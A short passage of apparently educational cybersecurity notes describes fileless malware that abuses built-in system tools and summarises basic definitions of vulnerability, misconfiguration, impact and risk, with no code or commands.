  • Key characteristics: it is stealthy in nature, uses existing system components and tools, and exploits the system's own tools ("living off the land").

Types of Fileless Malware

  • Fileless malware often targets legitimate applications or the operating system, abusing preinstalled tools and the file system.
  • An infected system can also serve as a source for spreading the infection laterally.

Final Key Points

  • Vulnerability refers to the existence of weaknesses that can be exploited by threat agents.
  • Common drivers of vulnerability are misconfiguration and insecure practices.
  • Misconfigurations arise from insecure protocols and a lack of patches.
  • Impacts of these misconfigurations vary, including data compromise and denial of service.
  • Risk is the potential for such exploitation and also varies according to what information is stolen.
